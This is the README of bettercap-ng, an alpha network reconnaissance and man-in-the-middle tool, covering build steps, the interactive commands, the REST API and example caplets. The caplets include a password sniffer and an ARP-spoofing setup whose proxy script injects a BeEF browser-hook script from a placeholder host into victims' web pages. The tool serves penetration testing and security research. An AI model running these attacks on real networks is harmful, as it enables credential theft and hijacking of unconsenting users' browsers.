The Swiss Army knife for 802.11, BLE, IPv4 and IPv6 networks reconnaissance and MITM attacks.
Find a file
2018-01-09 20:03:39 +01:00
caplets fix: removed debug logs from login manager abuser script 2018-01-08 10:39:51 +01:00
core docs: readme update 2018-01-08 10:57:33 +01:00
firewall new: centralized logging and implemented DELETE /api/events route, closes #5 2018-01-08 06:39:44 +01:00
log fix: fixed logging 2018-01-09 19:55:18 +01:00
modules fix: improved loggin 2018-01-09 14:54:48 +01:00
net refact: divided os specific code for arp parsing 2018-01-09 20:03:39 +01:00
packets new: centralized logging and implemented DELETE /api/events route, closes #5 2018-01-08 06:39:44 +01:00
session fix: fixed logging 2018-01-09 19:55:18 +01:00
tls new: api.rest is now on HTTPS (closes #5) 2018-01-08 07:37:29 +01:00
.gitignore Fixed compilation 2018-01-07 16:38:34 +01:00
.travis.yml fix: added libpcap-dev to travis file. 2018-01-07 16:57:06 +01:00
LICENSE.md preparing for github 2018-01-07 16:29:56 +01:00
main.go fix: logging improved 2018-01-09 14:21:34 +01:00
Makefile refact: refactored RestAPI module routes 2018-01-08 08:51:07 +01:00
README.md docs: readme update 2018-01-09 14:45:49 +01:00

BetterCap

bettercap-ng

Release Software License Travis Go Report Card


This is a WIP of the new version of bettercap, very alpha, do not use ... or do, whatever.

Compiling

Make sure you have a correctly configured Go >= 1.8 environment and the libpcap-dev package installed for your system, then:

git clone https://github.com/evilsocket/bettercap-ng $GOPATH/src/github.com/evilsocket/bettercap-ng
cd $GOPATH/src/github.com/evilsocket/bettercap-ng
make deps
make

To show the command line options:

# sudo ./bettercap-ng -h

Usage of ./bettercap-ng:
  -caplet string
        Read commands from this file and execute them in the interactive session.
  -debug
        Print debug messages.
  -eval string
        Run a command, used to set variables via command line.
  -iface string
        Network interface to bind to.
  -no-history
        Disable history file.
  -silent
        Suppress all logs which are not errors.

Caplets

Interactive sessions can be scripted with .cap files, or caplets, the following are a few basic examples, look the caplets folder for more.

caplets/simple-password-sniffer.cap

Simple password sniffer.

# keep reading arp table for network mapping
net.recon on
# setup a regular expression for packet payloads
set net.sniffer.regexp .*password=.+
# set the sniffer output file
set net.sniffer.output passwords.pcap
# start the sniffer
net.sniffer on

caplets/rest-api.cap

Start a rest API.

# change these!
set api.rest.username bcap
set api.rest.password bcap
# set api.rest.port 8082

# actively probe network for new hosts
net.probe on
net.recon on

# enjoy /api/session and /api/events
api.rest on

Get information about the current session:

curl -k --user bpcap:bcap https://bettercap-ip:8083/api/session

Execute a command in the current interactive session:

curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H "Content-Type: application/json" -X POST -d '{"cmd":"net.probe on"}'

Get last 50 events:

curl -k --user bpcap:bcap https://bettercap-ip:8083/api/events?n=50

Clear events:

curl -k --user bpcap:bcap -X DELETE https://bettercap-ip:8083/api/events

caplets/beef-inject.cap

Use a proxy script to inject a BEEF javascript hook:

# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"

# inject beef hook
set http.proxy.script caplets/beef-inject.js
# keep reading arp table for network mapping
net.recon on
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on

The caplets/beef.inject.js proxy script file:

function onLoad() {
    console.log( "BeefInject loaded." );
    console.log("targets: " + env['arp.spoof.targets']);
}

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>' 
            ); 
            res.Updated();
        }
    }
}

Interactive Mode

Interactive mode allows you to start and stop modules manually on the fly, change options and apply new firewall rules on the fly, the basic commands are:

Command Description
help Display list of available commands.
active Show information about active modules.
exit Close the session and exit.
sleep SECONDS Sleep for the given amount of seconds.
get NAME Get the value of variable NAME, use * for all.
set NAME VALUE Set the VALUE of variable NAME.

For instance you can view a list of declared variables with get * and set new ones, for example set some.new.variable some-value, for a list of every module and its parameters, issue the help command:

192.168.1.0/24 > 192.168.1.17  » help

Basic commands:

                  help : Display list of available commands.
                active : Show information about active modules.
                  exit : Close the session and exit.
         sleep SECONDS : Sleep for the given amount of seconds.
              get NAME : Get the value of variable NAME, use * for all.
        set NAME VALUE : Set the VALUE of variable NAME.

ARP Spoofer
Keep spoofing selected hosts on the network.

          arp.spoof on : Start ARP spoofer.
         arp.spoof off : Stop ARP spoofer.

  Parameters

     arp.spoof.targets : IP addresses to spoof. (default=<entire subnet>)


Events Stream
Print events as a continuous stream.

      events.stream on : Start events stream.
     events.stream off : Stop events stream.
          events.clear : Clear events stream.

  Parameters

  events.stream.filter : If filled, filter events by this prefix type. (default=)


HTTP Proxy
A full featured HTTP proxy that can be used to inject malicious contents into webpages, all HTTP traffic will be redirected to it.

         http.proxy on : Start HTTP proxy.
        http.proxy off : Stop HTTP proxy.

  Parameters

             http.port : HTTP port to redirect when the proxy is activated. (default=80)
    http.proxy.address : Address to bind the HTTP proxy to. (default=<interface address>)
       http.proxy.port : Port to bind the HTTP proxy to. (default=8080)
     http.proxy.script : Path of a proxy JS script. (default=)


Network Prober
Keep probing for new hosts on the network by sending dummy UDP packets to every possible IP on the subnet.

          net.probe on : Start network hosts probing in background.
         net.probe off : Stop network hosts probing in background.

  Parameters

    net.probe.throttle : If greater than 0, probe packets will be throttled by this value in milliseconds. (default=10)


Network Recon
Read periodically the ARP cache in order to monitor for new hosts on the network.

          net.recon on : Start network hosts discovery.
         net.recon off : Stop network hosts discovery.
              net.show : Show current hosts list.

Network Sniffer
Sniff packets from the network.

     net.sniffer stats : Print sniffer session configuration and statistics.
        net.sniffer on : Start network sniffer in background.
       net.sniffer off : Stop network sniffer in background.

  Parameters

    net.sniffer.regexp : If filled, only packets matching this regular expression will be considered. (default=)
    net.sniffer.output : If set, the sniffer will write captured packets to this file. (default=)
   net.sniffer.verbose : Print captured packets to screen. (default=true)
     net.sniffer.local : If true it will consider packets from/to this computer, otherwise it will skip them. (default=false)
    net.sniffer.filter : BPF filter for the sniffer. (default=not arp)


REST API
Expose a RESTful API.

           api.rest on : Start REST API server.
          api.rest off : Stop REST API server.

  Parameters

      api.rest.address : Address to bind the API REST server to. (default=<interface address>)
         api.rest.port : Port to bind the API REST server to. (default=8083)
     api.rest.username : API authentication username. (default=)
  api.rest.certificate : API TLS certificate. (default=~/.bettercap-ng.api.rest.certificate.pem)
          api.rest.key : API TLS key (default=~/.bettercap-ng.api.rest.key.pem)
     api.rest.password : API authentication password. (default=)

License

bettercap and bettercap-ng are made with ♥ by Simone Margaritelli and they're released under the GPL 3 license.